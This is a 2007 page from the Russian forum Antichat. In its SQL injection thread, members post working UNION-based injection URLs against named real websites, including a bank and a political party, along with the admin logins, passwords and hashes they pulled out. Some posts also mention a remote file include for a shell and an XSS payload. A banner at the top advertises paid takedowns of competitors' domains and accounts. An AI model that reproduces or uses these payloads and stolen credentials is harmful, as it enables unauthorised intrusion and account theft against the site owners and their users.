Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 295 из 1242

295

Опции темы

Поиск в этой теме

Опции просмотра

#2941

25.08.2007, 01:58

Nazaret2005

Новичок

Регистрация: 11.08.2007

Сообщений: 25

Провел на форуме:
131466

Репутация: 11

Цитата:

http://www.shidur.us/index.php?c=-41+union+select+1000,2000,3000,4000,5000,6000,7000 ,8000,9000,10000/*

4 версия

#2942

25.08.2007, 14:15

Ded MustD!e

Members of Antichat - Level 5

Регистрация: 23.08.2007

Сообщений: 417

Провел на форуме:
14324684

Репутация: 3908

Код:

http://www.yuta.co.yu/en/yuta/member.asp?id=1+or+1=(SELECT+TOP+1+USERNAME+from+Admin)--

Код:

http://www.yuta.co.yu/en/yuta/member.asp?id=1+or+1=(SELECT+TOP+1+PASSWD+from+Admin)--

Данные админа:

Login: admin
Password: P@ssw0rd

Админка находится по адресу

Код:

http://www.yuta.co.yu/admin/

#2943

25.08.2007, 17:30

Red_Red1

Участник форума

Регистрация: 12.01.2007

Сообщений: 262

Провел на форуме:
4608122

Репутация: 874

Отправить сообщение для Red_Red1 с помощью ICQ

Цитата:

Сообщение от Nazaret2005

http://www.shidur.us/index.php?c=-41+union+select+1000,2000,3000,4000,5000,6000,7000 ,8000,9000,10000/*
4 версия

Четвертая версия не мешает провести ПХП иньекцию, так что пост надо в ПХП.

http://www.shidur.us/index.php?page=[шелл] - удаленные инклуд

#2944

26.08.2007, 11:08

0nep@t0p

Участник форума

Регистрация: 25.05.2007

Сообщений: 147

Провел на форуме:
2313429

Репутация: 728

Банк "Левобережный"

Цитата:

_http://www.nskbl.ru/news/?id=-296+u nion +select+1,2,3,4,5/*

Давно мечтал похекать какой-нибудь банковский ресурс, но прав для чтения из users не хватает, не знаю что еще можно сделать

Версия 4.0.18

#2945

26.08.2007, 19:00

geezer.code

Reservists Of Antichat - Level 6

Регистрация: 22.01.2007

Сообщений: 616

Провел на форуме:
7452489

Репутация: 1359

бригада

строительная )))

Код:

http://brigada.uz/plugins/ansmt/ansmt_view.php?id=-44+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_name,user_loginname,user_password,user_email),8,9,10,11,12,13,14+from+brigada_user

стоит двиг е107.

#2946

26.08.2007, 20:40

l-l00K

Leaders of Antichat - Level 4

Регистрация: 26.11.2006

Сообщений: 237

Провел на форуме:
13395217

Репутация: 2097

Урал Инфо Проект

Код:

http://www.uip.ru/index.php?id=-3'+UNION+SELECT+1,%3Cscript%3Ealert('H00k%20%E1%FB%EB%20%E7%E4%E5%F1%FC!')%3C/script%3E,3,4,5,6,7,8+FROM+news+--+

__________________
Не занимаюсь коммерцией в любых ее проявлениях.

#2947

27.08.2007, 00:29

halkfild

Leaders of Antichat - Level 4

Регистрация: 11.11.2005

Сообщений: 391

Провел на форуме:
7084941

Репутация: 2277

в антибояне проверял вроде нет

Цитата:

http://english.fortline.ru/page.php?TPLID=10&ID=-12'+union+select+concat_ws(0x3a,version(),user(),d atabase()),2+/*

5.0.22:fortline@localhost:fortline

Цитата:

http://english.fortline.ru/page.php?TPLID=10&ID=-12'+union+select+concat_ws(0x3a,login,password),2+ from+users/*

admin:Y2g3Yjhh

Цитата:

http://www.muz.md/studio.php?stdid=-11+union+select+1,concat_ws(0x3a,user(),version(), database())/*

adm_music@localhost:4.0.27-log:music

Последний раз редактировалось halkfild; 27.08.2007 в 12:36.. Причина: +1 inject

#2948

27.08.2007, 13:03

Kaimi

Reservists Of Antichat - Level 6

Регистрация: 23.08.2007

Сообщений: 1,237

Провел на форуме:
18127311

Репутация: 1676

Отправить сообщение для Kaimi с помощью ICQ

Код:

http://rustelcard.ru/index.php?option=com_rwcards&task=listCards&category_id=-1'union%20select%201,2,03,4,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,119,111,114,100,58),password),50,044,076,0678,07%20from%20jos_users/*

username:admin
password:06c09e25d642a677aa787b2cdee94350

#2949

27.08.2007, 13:29

l-l00K

Leaders of Antichat - Level 4

Регистрация: 26.11.2006

Сообщений: 237

Провел на форуме:
13395217

Репутация: 2097

Недвижимость

Код:

http://base.gwru.ru/in.php?id=-459+UNION+SELECT+1,2,3,password,email,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+FROM+users+--+

email:mailbox@gwru.ru
password:60bcdf9367b7aada606e446fecc1a47d
Также на сайте полно Xss

__________________
Не занимаюсь коммерцией в любых ее проявлениях.

#2950

27.08.2007, 20:29

Y.Dmitriy

Постоянный

Регистрация: 14.03.2007

Сообщений: 367

Провел на форуме:
1392441

Репутация: 161

Отправить сообщение для Y.Dmitriy с помощью ICQ

Отправить сообщение для Y.Dmitriy с помощью AIM

Отправить сообщение для Y.Dmitriy с помощью MSN

Либеральная партия Украины
http://www.lpu.org.ua/index.php?area=1+union+select+1,2,3,4,5,6/*
2Grey:
прошу прощенья но по поводу баяна не знал... и вообще каковы критерии для обощения данными аргументами... есть где-то ещё?..

Последний раз редактировалось Y.Dmitriy; 28.08.2007 в 14:49..

Страница 295 из 1242

295

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход